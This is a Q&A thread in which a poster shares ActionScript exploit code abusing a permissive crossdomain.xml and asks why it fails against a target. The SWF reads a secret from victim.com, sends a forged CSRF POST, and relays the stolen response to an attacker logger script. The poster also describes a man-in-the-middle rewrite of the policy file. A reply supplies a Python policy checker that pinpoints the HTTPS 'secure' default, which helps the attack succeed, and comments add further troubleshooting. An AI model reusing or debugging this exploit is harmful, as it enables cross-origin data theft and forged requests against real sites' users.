
I am using an SWF generated from the following ActionScript to make cross-origin calls from the SWF hosted on http://something.subdomain.victim.com:8000/ to http://victim.com/a?secret=test.

https://victim.com has a permissive crossdomain.xml at https://victim.com/crossdomain.xml as given below.

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy 
  SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <allow-access-from domain="*.victim.com" />
</cross-domain-policy>

ActionScript

// Adaptation of an exploit by John M as defined in 
// https://medium.com/@x41x41x41/exploiting-crossdomain-xml-missconfigurations-3c8d407d05a8
// The PHP server side is replaced with a simpler Python CGI. Thanks to TrustedSec

package {
 import flash.display.Sprite;
 import flash.events.*;
 import flash.net.URLRequestMethod;
 import flash.net.URLRequest;
 import flash.net.URLVariables;
 import flash.net.URLLoader;
 import flash.net.URLLoaderDataFormat;

 public class crossDomain extends Sprite {
  public function crossDomain() {

   // Fetching secret.

   var firstrequest:URLRequest = new URLRequest("https://victim.com/a?secret=test");
   var firstloader:URLLoader = new URLLoader();
   firstloader.addEventListener(Event.COMPLETE, completeHandler);
   // A policy denial is reported asynchronously as a SecurityErrorEvent;
   // the try/catch below only catches errors thrown synchronously by load().
   firstloader.addEventListener(SecurityErrorEvent.SECURITY_ERROR, securityErrorHandler);
   firstloader.addEventListener(IOErrorEvent.IO_ERROR, ioErrorHandler);
   try {
    firstloader.load(firstrequest);
   } catch (error: Error) {
    trace("Unable to load URL: " + error);
   }

   // Performing CSRF with a POST

   var secondvariables:URLVariables = new URLVariables("a=test1&b=test2&c=test3&final=nothing");
   var secondrequest:URLRequest = new URLRequest("http://victim.com/someaction.html");
   secondrequest.method = URLRequestMethod.POST;
   secondrequest.data = secondvariables;
   var secondloader:URLLoader = new URLLoader();
   secondloader.dataFormat = URLLoaderDataFormat.VARIABLES;
   secondloader.addEventListener(SecurityErrorEvent.SECURITY_ERROR, securityErrorHandler);
   secondloader.addEventListener(IOErrorEvent.IO_ERROR, ioErrorHandler);
   try {
    secondloader.load(secondrequest);
   } catch (error: Error) {
    trace("Unable to load URL: " + error);
   }

  }

  private function completeHandler(event: Event): void {

   // Relaying the HTTP response to the attacker server.

   var request:URLRequest = new URLRequest("http://something.subdomain.victim.com:8000/cgi-bin/postlogger.py");
   var variables:URLVariables = new URLVariables();
   variables.data = event.target.data;
   request.method = URLRequestMethod.POST;
   request.data = variables;
   var loader:URLLoader = new URLLoader();
   try {
    loader.load(request);
   } catch (error: Error) {
    trace("Unable to load URL: " + error);
   }
  }

  private function securityErrorHandler(event: SecurityErrorEvent): void {
   // Fired when the cross-domain policy check rejects a request.
   trace("Security error: " + event.text);
  }

  private function ioErrorHandler(event: IOErrorEvent): void {
   trace("IO error: " + event.text);
  }
 }
}
  1. I tested this code locally by configuring localhost as the victim origin, which serves a wildcard crossdomain.xml [<allow-access-from domain="*" />], and 127.0.0.1 as the attacker origin, which serves crossDomain.swf.
  2. The SWF worked exactly as intended, requesting crossdomain.xml first, followed by calls to the two URLs on origin localhost defined in the ActionScript.
  3. However, when hosting this on http://something.subdomain.victim.com:8000, the first step, retrieving crossdomain.xml from https://victim.com/crossdomain.xml, is happening. However, the further requests are not.
  4. To ensure that it is not a crossdomain policy issue, I did a Man-In-The-Middle and replaced the <allow-access-from domain="*.victim.com" /> with <allow-access-from domain="*" />.
  5. So at this stage, as far as the browser is concerned, the crossdomain.xml for victim.com is a *. Yet further requests are not happening.

I can't find a potential reason for this confusing behavior. I am an ActionScript noob. Any pointers on why this is happening would be highly appreciated.

hax
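Whether a SWF origin gets through a crossdomain.xml depends on more than the domain attribute. Adobe's cross-domain policy file specification also makes the secure attribute of allow-access-from default to true when the policy file is served over HTTPS, in which case only SWFs loaded over HTTPS are granted access, and a site-control meta-policy of none switches policy files off entirely. The checker below is an added example written for this page; it is not code from the poster or from the linked write-up. It parses a policy file and decides whether a SWF at a given URL would be granted access by a policy fetched from a given URL. The sample policies are constructed here (the first mirrors the one in the question), and treating the apex domain as matching its own *.victim.com wildcard is this example's reading of the spec.

```python
"""Evaluate whether a Flash URL policy file (crossdomain.xml) grants a SWF
origin access.  Added example, not code from the original post.  Matching
rules follow Adobe's cross-domain policy file specification as understood
here; the apex-domain case of a "*.example.com" wildcard is an assumption."""
from urllib.parse import urlsplit
import xml.etree.ElementTree as ET

# Constructed sample policies.  The first mirrors the one in the question.
VICTIM_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
  SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <allow-access-from domain="*.victim.com" />
</cross-domain-policy>"""

VICTIM_POLICY_INSECURE = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*.victim.com" secure="false" />
</cross-domain-policy>"""

WILDCARD_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" />
</cross-domain-policy>"""

LOCKED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="none" />
  <allow-access-from domain="*" />
</cross-domain-policy>"""


def domain_matches(pattern: str, host: str) -> bool:
    """Match an allow-access-from domain value against the SWF's host.

    "*" matches everything.  "*.example.com" matches any host ending in
    ".example.com"; this example also accepts "example.com" itself
    (assumption about the spec, adjust if your target disagrees).
    Anything else is an exact, case-insensitive host comparison.
    """
    pattern, host = pattern.lower(), host.lower()
    if pattern == "*":
        return True
    if pattern.startswith("*."):
        return host.endswith(pattern[1:]) or host == pattern[2:]
    return host == pattern


def policy_allows(policy_xml: str, swf_url: str, policy_url: str) -> tuple:
    """Return (allowed, reason) for a SWF at swf_url reading data from the
    site whose policy file, fetched from policy_url, is policy_xml."""
    swf, policy = urlsplit(swf_url), urlsplit(policy_url)
    try:
        root = ET.fromstring(policy_xml)
    except ET.ParseError as exc:
        return False, f"unparseable policy: {exc}"
    if root.tag != "cross-domain-policy":
        return False, "root element is not <cross-domain-policy>"

    # A meta-policy of "none" disables every policy file, the master included.
    site_control = root.find("site-control")
    if site_control is not None and \
            site_control.get("permitted-cross-domain-policies") == "none":
        return False, "site-control permits no cross-domain policies"

    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        if not domain_matches(domain, swf.hostname or ""):
            continue
        # secure defaults to true when the policy itself came over HTTPS;
        # a true value restricts access to SWFs that were loaded over HTTPS.
        default_secure = "true" if policy.scheme == "https" else "false"
        secure = rule.get("secure", default_secure).lower() != "false"
        if secure and policy.scheme == "https" and swf.scheme != "https":
            return False, (f'domain="{domain}" matches but secure is true: '
                           "an HTTP SWF may not use an HTTPS policy")
        return True, f'allowed by domain="{domain}"'
    return False, f"no allow-access-from rule matches {swf.hostname}"


if __name__ == "__main__":
    # The scenario from the question: HTTP SWF on a subdomain, HTTPS policy.
    print(policy_allows(VICTIM_POLICY,
                        "http://something.subdomain.victim.com:8000/crossDomain.swf",
                        "https://victim.com/crossdomain.xml"))
```

Running the question's own scenario through it: the HTTP SWF on something.subdomain.victim.com:8000 matches the *.victim.com rule but is refused because the policy was fetched over HTTPS with secure left at its default of true; the same SWF is accepted if the rule carries secure="false", if the policy is fetched over plain HTTP, or if the SWF itself is served over HTTPS. The localhost test with a bare * policy over HTTP passes, which is consistent with that test not exercising the secure rule.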
  • Just a wild guess, **http://something.subdomain.victim.com:8000/** should also have its own copy of **crossdomain.xml**. I think permit to the main domain does not automatically permit requests to sub-domains. – Organis Oct 05 '19 at 11:46
  • @organis something.subdomain.victim.com:8000 is where the exploit is hosted. It is the source origin. It having own cross domain policy should not govern requests to victim.com, right? – hax Oct 05 '19 at 15:02
  • You said the SWF is hosted at http://127.0.0.1/ – Organis Oct 05 '19 at 16:23
  • Perhaps I was not clear. The last part is about how I made sure that it isn't a code error – hax Oct 05 '19 at 16:23
  • Please read the points 1 through towards the end of the question. – hax Oct 05 '19 at 16:25
  • I quite understand that it is not a code error, it's a security thing. The problem might be in the fact your SWF starts not only from sub-domain, but also from specified port. Seems this problem is similar: https://stackoverflow.com/questions/14501071/flash-policy-file-not-working-same-domain-different-port – Organis Oct 05 '19 at 17:22
